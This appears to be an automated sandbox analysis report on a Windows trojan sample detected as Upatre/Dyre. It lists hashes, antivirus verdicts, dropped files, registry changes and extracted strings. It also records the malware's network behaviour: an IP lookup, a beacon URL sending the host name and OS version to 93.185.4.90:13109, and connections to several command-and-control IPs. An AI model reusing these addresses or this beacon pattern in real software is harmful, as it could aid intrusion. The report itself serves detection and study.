Analysis Date2015-10-30 16:05:53
MD5a8192385e4d7e52e2242c55cd7ac8399
SHA17c70449764985cadc22d2aafbaa061d90e8b193f

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
PEhashc45447d51bbb2ddcf1a17f5449994306062b82d0
IMPhash
AVRisingTrojan.Win32.Kryptik.ac
AVMcafeeDownloader-FAUU!A8192385E4D7
AVAvira (antivir)TR/Kryptik.vmdux
AVTwisterTrojan.Generic.zaro
AVAd-AwareTrojan.Agent.BJXM
AVAlwil (avast)Trojan-gen:Win32:Trojan-gen
AVEset (nod32)Win32/Kryptik.DIPT
AVGrisoft (avg)Cryptic.EWT
AVSymantecDownloader.Upatre!gen9
AVFortinetW32/Waski.F!tr
AVBitDefenderTrojan.Agent.BJXM
AVK7Trojan ( 004c123f1 )
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Upatre.BC
AVMicroWorld (escan)Trojan.Agent.BJXM
AVMalwareBytesSpyware.Dyre
AVAuthentiumW32/Upatre.BB
AVFrisk (f-prot)W32/Upatre.BB
AVIkarusTrojan.Crypt
AVEmsisoftTrojan.Agent.BJXM
AVZillya!no_virus
AVKasperskyTrojan.Win32.Generic
AVTrend MicroTROJ_UPATRE.SMC2
AVCAT (quickheal)TrojanDownloader.Upatre.WR6
AVVirusBlokAda (vba32)BScope.Malware-Cryptor.Hlux
AVPadvishno_virus
AVBullGuardTrojan.Agent.BJXM
AVArcabit (arcavir)Trojan.Agent.BJXM
AVClamAVno_virus
AVDr. WebTrojan.DownLoader13.17962
AVF-SecureTrojan.Agent.BJXM
AVCA (E-Trust Ino)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\3780061Log.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\makedopar.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\makedopar.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\makedopar.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\icanhazip[1].htm
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes FileC:\malware.exe
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS96.46.103.232
Winsock DNS87.255.64.223
Winsock DNS68.70.242.203
Winsock DNS73.22.119.204
Winsock DNS93.185.4.90
Winsock DNS96.46.99.183
Winsock DNS93.119.102.70
Winsock DNS96.46.100.49
Winsock DNSicanhazip.com

Network Details:

DNSicanhazip.com
Type: A
64.182.208.185
DNSicanhazip.com
Type: A
64.182.208.184
HTTP GEThttp://icanhazip.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
HTTP GEThttp://93.185.4.90:13109/MIS12/COMPUTER-XXXXXX/0/51-SP3/0/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Flows TCP192.168.1.1:1031 ➝ 64.182.208.185:80
Flows TCP192.168.1.1:1032 ➝ 93.185.4.90:13109
Flows TCP192.168.1.1:1033 ➝ 87.255.64.223:443
Flows TCP192.168.1.1:1034 ➝ 87.255.64.223:443
Flows TCP192.168.1.1:1035 ➝ 87.255.64.223:443
Flows TCP192.168.1.1:1036 ➝ 87.255.64.223:443
Flows TCP192.168.1.1:1037 ➝ 93.119.102.70:443
Flows TCP192.168.1.1:1038 ➝ 93.119.102.70:443
Flows TCP192.168.1.1:1039 ➝ 93.119.102.70:443
Flows TCP192.168.1.1:1040 ➝ 93.119.102.70:443
Flows TCP192.168.1.1:1041 ➝ 73.22.119.204:443
Flows TCP192.168.1.1:1042 ➝ 73.22.119.204:443
Flows TCP192.168.1.1:1043 ➝ 73.22.119.204:443
Flows TCP192.168.1.1:1044 ➝ 73.22.119.204:443
Flows TCP192.168.1.1:1045 ➝ 96.46.103.232:443
Flows TCP192.168.1.1:1046 ➝ 96.46.103.232:443
Flows TCP192.168.1.1:1047 ➝ 96.46.103.232:443
Flows TCP192.168.1.1:1048 ➝ 96.46.103.232:443
Flows TCP192.168.1.1:1049 ➝ 96.46.100.49:443
Flows TCP192.168.1.1:1050 ➝ 96.46.100.49:443
Flows TCP192.168.1.1:1051 ➝ 96.46.100.49:443
Flows TCP192.168.1.1:1052 ➝ 96.46.100.49:443
Flows TCP192.168.1.1:1053 ➝ 96.46.99.183:443
Flows TCP192.168.1.1:1054 ➝ 96.46.99.183:443
Flows TCP192.168.1.1:1055 ➝ 96.46.99.183:443
Flows TCP192.168.1.1:1056 ➝ 96.46.99.183:443

Raw Pcap
0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   41636365 70743a20 74657874 2f2a2c20   Accept: text/*, 
0x00000020 (00032)   6170706c 69636174 696f6e2f 2a0d0a55   application/*..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000040 (00064)   6c612f35 2e302028 57696e64 6f777320   la/5.0 (Windows 
0x00000050 (00080)   4e542036 2e313b20 574f5736 343b2072   NT 6.1; WOW64; r
0x00000060 (00096)   763a3337 2e302920 4765636b 6f2f3230   v:37.0) Gecko/20
0x00000070 (00112)   31303031 30312046 69726566 6f782f33   100101 Firefox/3
0x00000080 (00128)   372e300d 0a486f73 743a2069 63616e68   7.0..Host: icanh
0x00000090 (00144)   617a6970 2e636f6d 0d0a4361 6368652d   azip.com..Cache-
0x000000a0 (00160)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x000000b0 (00176)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f4d4953 31322f43 4f4d5055   GET /MIS12/COMPU
0x00000010 (00016)   5445522d 58585858 58582f30 2f35312d   TER-XXXXXX/0/51-
0x00000020 (00032)   5350332f 302f2048 5454502f 312e310d   SP3/0/ HTTP/1.1.
0x00000030 (00048)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000040 (00064)   696c6c61 2f352e30 20285769 6e646f77   illa/5.0 (Window
0x00000050 (00080)   73204e54 20362e31 3b20574f 5736343b   s NT 6.1; WOW64;
0x00000060 (00096)   2072763a 33372e30 29204765 636b6f2f    rv:37.0) Gecko/
0x00000070 (00112)   32303130 30313031 20466972 65666f78   20100101 Firefox
0x00000080 (00128)   2f33372e 300d0a48 6f73743a 2039332e   /37.0..Host: 93.
0x00000090 (00144)   3138352e 342e3930 3a313331 30390d0a   185.4.90:13109..
0x000000a0 (00160)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000b0 (00176)   6f2d6361 6368650d 0a0d0a              o-cache....

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.


Strings
\
.]]]}.Zx
[31ZBBB
3!3!3*A	i):(3
3;3)F"
3]"=H3
[3RRBBBs
3:"z2_b
6IcN,?
</assembly>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
ATMGetOutlineW
ATMGetPostScriptName
ATMGetPostScriptNameA
ATMGetPostScriptNameW
ATMGetVersion
ATMGetVersionEx
ATMGetVersionExA
ATMGetVersionExW
ATMInstallSubstFontA
ATMInstallSubstFontW
atmlib.dll
_BBBBI
^_BBBBI2Z
BBBR3z
"BBOBRBB
bOBBBR(
BORBBB
[catBR
catsrv.DLL
clusapi.dll
ClusterRegGetKeySecurity
ClusterRegOpenKey
ClusterRegQueryInfoKey
ClusterRegQueryValue
ClusterRegSetKeySecurity
ClusterRegSetValue
ClusterResourceCloseEnum
ClusterResourceControl
ClusterResourceEnum
ClusterResourceGetEnumCount
ClusterResourceOpenEnum
ClusterResourceTypeCloseEnum
ClusterResourceTypeControl
ClusterResourceTypeEnum
ClusterResourceTypeGetEnumCount
ClusterResourceTypeOpenEnum
</compatibility>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
comsnap.dll
c^r7%7
CreateClusterGroup
CreateClusterNotifyPort
CreateClusterResource
CreateClusterResourceType
.dAte1
DBBB3)
DBBBI3J
DeleteClusterGroup
DeleteClusterResource
DOB@BB
ExitProcess
F}+2jO]
f.4j[`
@.GDATA
GetACP
GetCatalogCRMClerk
GetCommandLineA
GetCommState
GetOEMCP
GetSystemDirectoryA
GetTickCount
'[h3[x
HTUI_ColorAdjustment
htui.dll
IcmpCreateFile
icmp.dll
IcmpSendEcho
InstallDsExtension
IPSecClosePolicyStore
IPSecCopyAuthMethod
IPSecCopyFilterData
IPSecCopyFilterSpec
IPSecCopyISAKMPData
IPSecCopyNegPolData
IPSecCopyNFAData
IPSecCopyPolicyData
IPSecCreateFilterData
IPSecCreateISAKMPData
IPSecCreateNegPolData
IPSecCreateNFAData
IPSecCreatePolicyData
IPSecDeleteFilterData
IPSecDeleteISAKMPData
IPSecDeleteNegPolData
IPSecDeleteNFAData
IPSecDeletePolicyData
IPSecEnumFilterData
IPSecEnumISAKMPData
JOB@BB
JOB@BBO
ju)y]3
kernel32.dll
mpr.dll
msvcrt.dll
nOBRBB
OpenComponentLibraryTS
polstore.dll
rBBB"<
REGAPI.dll
RegBuildNumberQuery
RegCdCreateA
RegCdCreateW
RegCdDeleteA
RegCdDeleteW
RegCdEnumerateA
RegCdEnumerateW
RegCdQueryA
RegCdQueryW
RegCloseServer
RegConsoleShadowQueryA
RegConsoleShadowQueryW
RegDefaultUserConfigQueryA
RegDefaultUserConfigQueryW
.relac
</requestedExecutionLevel>
<requestedExecutionLevel level="requireAdministrator" uiAccess="false">
</requestedPrivileges>
<requestedPrivileges>
r$:r&RhG
</security>
<security>
SetErrorMode
SetFilePointer
!This program cannot be run in DOS mode.
</trustInfo>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
_u"BB3
UbBBBs
w{BBBB3
WNetGetUserA
WNetGetUserW
WNetLogonNotify
WNetOpenEnumA
WNetOpenEnumW
WNetPropertyDialogA
WNetPropertyDialogW
x!2v\g
~'Y3:u
$Z<7$9(
ZE_/?u